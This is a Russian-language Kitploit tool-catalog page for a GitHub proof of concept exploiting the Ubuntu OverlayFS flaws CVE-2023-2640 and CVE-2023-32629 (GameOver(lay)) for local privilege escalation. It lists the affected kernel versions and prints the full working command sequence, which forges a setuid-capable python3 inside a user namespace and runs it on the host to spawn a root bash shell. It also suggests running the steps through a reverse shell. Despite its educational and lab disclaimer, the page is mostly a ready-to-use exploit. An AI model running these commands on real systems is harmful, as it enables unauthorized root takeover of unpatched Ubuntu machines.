Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-2640-CVE-2023-32629-Interactive-PoC — Чистый интерактивный многоэтапный эксплойт локального повышения привилегий (LPE) для Ubuntu OverlayFS (GameOver(lay)), который выходит из песочницы пользовательского пространства имён, чтобы получить настоящую root-оболочку хоста. | Kitploit
Инструменты/GitHubGitHub/amar-imamovic/cve-2023-2640-cve-2023-32629-interactive-poc
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubamar-imamovic/cve-2023-2640-cve-2023-32629-interactive-poc

CVE-2023-2640-CVE-2023-32629-Interactive-PoC

Чистый интерактивный многоэтапный эксплойт локального повышения привилегий (LPE) для Ubuntu OverlayFS (GameOver(lay)), который выходит из песочницы пользовательского пространства имён, чтобы получить настоящую root-оболочку хоста.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
2 месяцев назадЕщё не проверено

CVE-2023-2640 и CVE-2023-32629 (GameOverLay) - PoC получения настоящего root на хосте

Интерактивный многоэтапный Proof of Concept (PoC) локального повышения привилегий (LPE), нацеленный на уязвимости OverlayFS в ядре Ubuntu Linux (CVE-2023-2640 / CVE-2023-32629).

В отличие от стандартных автоматических однострочников, которые запирают вашу интерактивную оболочку внутри ограниченного пользовательского пространства имён (Fake Root), данная методика разделяет последовательность эксплойта, чтобы безопасно получить настоящую, неограниченную root-оболочку хоста.


Объяснение проблемы «Fake Root»

Многие публичные эксплойты объединяют настройку и выполнение в единую автоматизированную последовательность команд оболочки, например: unshare -rm sh -c "mkdir l u w m && ... && touch m/*; python3 -c '...'"

Поскольку исполняемая нагрузка Python находится внутри двойных кавычек команды unshare, она выполняется внутри песочницы пользовательского пространства имён.

  • Результат: Ваш идентификатор пользователя отображается как uid=0(root), но ваша оболочка криптографически изолирована от хоста. Если вы попытаетесь просмотреть корневой каталог хоста (cd /root), вы получите ошибку Permission Denied.

Решение

Этот PoC разделяет процесс на два отдельных логических этапа:

  1. Подготовка бэкдора внутри песочницы: Запустите unshare, чтобы подделать root-права ровно настолько, насколько нужно для эксплуатации дефекта ovl_copy_up в OverlayFS, добившись утечки высокопривилегированной возможности setcap cap_setuid+eip в локальную папку с бинарником Python.
  2. Выполнение вне песочницы: Пространство имён автоматически закрывается. Затем бинарник с бэкдором выполняется напрямую из реального контекста хоста от имени обычного непривилегированного пользователя. Ядро считывает просочившийся флаг, разрешает os.setuid(0) и предоставляет вам настоящие привилегии системного администратора уровня хоста.

Детали уязвимостей

  • CVE-2023-2640: Некорректное ограничение файловых capabilities в пользовательских пространствах имён в OverlayFS ядра Ubuntu.
  • CVE-2023-32629: Дефект в функции ovl_copy_up_meta_inode_data ядра Ubuntu, позволяющий полностью обойти проверки валидации при миграции файлов.
  • Затронутые системы: Ubuntu 22.04 LTS с версиями ядра Linux ниже 6.2.0-26-generic.

Инструкции по использованию

Способ 1: Автоматический скрипт (рекомендуется)

  1. Склонируйте или скачайте exploit.sh на целевую машину (например, в /tmp).
  2. Выдайте ему права на выполнение и запустите:
root@kitploit:~
chmod +x exploit.sh
./exploit.sh

Способ 2: Ручное интерактивное выполнение построчно

Если вы работаете через нестабильный reverse shell, выполняйте эти команды по отдельности, нажимая Enter после каждой строки:

root@kitploit:~
# 1. Clean workspace environment 
cd /tmp && rm -rf l u w m

# 2. Forge the backdoor within the temporary namespace sandbox
unshare -rm sh -c "mkdir l u w m && cp /usr/bin/python3 l/ && setcap cap_setuid+eip l/python3 && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*"

# 3. Trigger execution on the real host to claim true root
./u/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Проверьте свои реальные привилегии, посмотрев текущий профиль пользователя:

root@kitploit:~
whoami
cat /root/root.txt

Авторы и благодарности

Базовые механизмы эксплойта, использованные в этой интерактивной доработке, были первоначально обнаружены и задокументированы исследователями безопасности Liav Eliyahu и g1vi.

Отказ от ответственности

Этот репозиторий создан строго в образовательных целях, для исследований в области безопасности и авторизованного тестирования на проникновение (например, лаборатории HackTheBox / OffSec). Автор не несёт ответственности за неправомерное использование, попытки несанкционированного доступа или ущерб инфраструктуре, причинённый данными материалами. Используйте ответственно.

Скачать инструмент